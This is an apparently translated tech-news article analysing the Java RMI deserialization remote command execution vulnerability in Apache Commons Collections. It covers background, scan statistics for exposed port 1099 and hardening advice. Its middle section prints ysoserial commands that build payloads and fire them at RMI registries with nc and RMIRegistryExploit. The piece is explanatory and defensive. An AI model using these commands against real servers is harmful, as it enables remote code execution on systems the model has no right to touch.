Shulou(Shulou.com)05/31 Report--

What this article shares with you is the analysis of vulnerabilities in the execution of Rmi commands in JAVA deserialization. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

1 Overview

As early as January 28, 2015, Gabriel Lawrence and Chris Frohoff gave a report on AppSecCali that Java deserialization vulnerabilities could take advantage of Apache Commons Collections, a commonly used Java library, for arbitrary code execution, but it didn't attract much attention at the time. Later, the FoxGlove Security security team released a long blog describing the real case of using Java deserialization and Apache Commons Collections as a basic class library to achieve remote command execution. The major Java Web Server lay guns one after another, and this vulnerability swept through the latest version of WebLogic, WebSphere, JBoss, Jenkins, and OpenNMS. At that time, the major src platforms were flooded with vulnerabilities.

In view of this "most undervalued vulnerability in 2015", the major affected Java application manufacturers have released repaired versions one after another, and the Apache Commons Collections project has also carried out some security treatment to the class libraries with vulnerabilities, but there are still a large number of websites on the network affected by this vulnerability. The object of this discussion is the JAVA RMI deserialization remote command execution vulnerability.

2 what is java RMI

RMI is the abbreviation of REMOTE METHODINVOCATION and a part of J2SE, which allows programmers to develop distributed applications based on JAVA. A RMI object is a remote JAVA object, and its methods can be called from another JAVA virtual machine (or even across the network). The methods of remote objects can be called like the methods of local JAVA objects, so that objects distributed in different JVM look and behave like local objects. For any RMI interface that takes an object as a parameter, you can send a self-built object, forcing the server to deserialize the object as any serializable class that exists in the class path.

The Java rmi remote call is as follows:

RMI remote invocation steps:

The client object calls the method on the client helper object

L the client helper object packages the call information (variable, method name) and sends it to the server helper object over the network.

L the server helper object unpacks the information sent by the client helper object to find out the method that is actually called and the object in which the method is located.

Call the real method on the real service object and return the result to the server helper object

L the server helper packages the result and sends it to the client helper.

The client helper object unpacks the return value and returns it to the customer object.

L customer object gets the return value

3 what is the execution of the Java Rmi command

Port 1099 is the default port for Java RMI, and RMI uses serialization for all interactions by default, so this is a very common vulnerability. If the port is exposed on the public network and a vulnerable version of Apache Commons Collections is used, the relevant commands can be executed on the server. This is an attempt to exploit ysoserial for vulnerability analysis.

The attack payload is encapsulated in the form of Proxy in Java, and a large number of pan-types are used in the process of re-encapsulation of Proxy, so that payload can deal with different applications.

This vulnerability can be used to execute relevant commands on the server, as shown here

$java-jar ysoserial.jar CommonsCollections1 calc.exe | xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c.... sr.2sun.refl

0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A

0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat

0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov

0000560: 6572 7269 6465 0000 0000 0000 erride.

0000570: 0078 7071 007e 003a .xpq.

$java-jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

$nc xx.xx.xx.xx 1099 < groovypayload.bin

$java-cp ysoserial.jarysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

Use this vulnerability to view the contents of relevant datasource files

Attacks on RMI services can also be echoed using the URLClassLoader method

4 impact of current vulnerabilities in Java Rmi

Although it has been 4 years since the Java RMI service remote command execution vulnerability, this vulnerability still exists on many servers on the public network. Here, preliminary statistics are made on the opening of 1099 ports in China. The specific results are as follows:

Through the statistics of the simple scan results, it is found that 12310 hosts with 1099 ports are open in China, of which 3891 hosts use ports for RMI interaction, accounting for 31.6%, and there are 3114 deserialization vulnerabilities, accounting for 25.29%.

5 opinions on reinforcement

Turn off the opening of the port of rmi service in the public network

Download SerialKiller temporary patch, this jar is placed in classpath, replace the java.io.ObjectInputStream in the application code with SerialKiller, and then configure it to allow or disable some problematic classes. SerialKiller has several features of Hot-Reload,Whitelisting,Blacklisting, which controls the trusted type after external input deserialization.

Delete the InvokerTransformer.class file in the project temporarily without affecting the business

The middleware such as WebLogic, Apache, JBoss and so on are upgraded regularly.

The above is the analysis of Rmi command execution vulnerabilities in JAVA deserialization. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.